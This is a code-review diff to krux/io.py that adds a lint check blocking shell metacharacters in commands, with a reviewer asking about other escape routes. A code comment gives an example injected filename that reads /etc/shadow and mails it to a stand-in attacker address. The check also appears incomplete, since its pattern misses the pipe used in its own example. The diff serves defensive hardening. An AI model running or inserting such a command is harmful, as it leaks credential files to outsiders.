krux/io.py

```diff
@@ -103,6 +103,22 @@ def is_regex(thing):
         if shell is True and timeout is not None:
             command = 'exec ' + command
 
+        # GOTCHA: in the case where run() is called with user input populating `command`, the oppportunity exists to
+        # pass in a filename like `sudo cat /etc/shadow | mail -s hi cracker@p0wn.io`. We should cowardly fail to run
+        # such a command, unless linting has been disabled.
+        if lint_command:
+            command_string = command
+            if isinstance(command, object):
+                command_string = str(command)
+            if isinstance(command, list):
+                command_string = ' '.join(command)
+            if re.search(r'[`$()]', command_string):
```

Comment:
is this the recommended change to us? Are there any other ways to escape this that we need to search for too?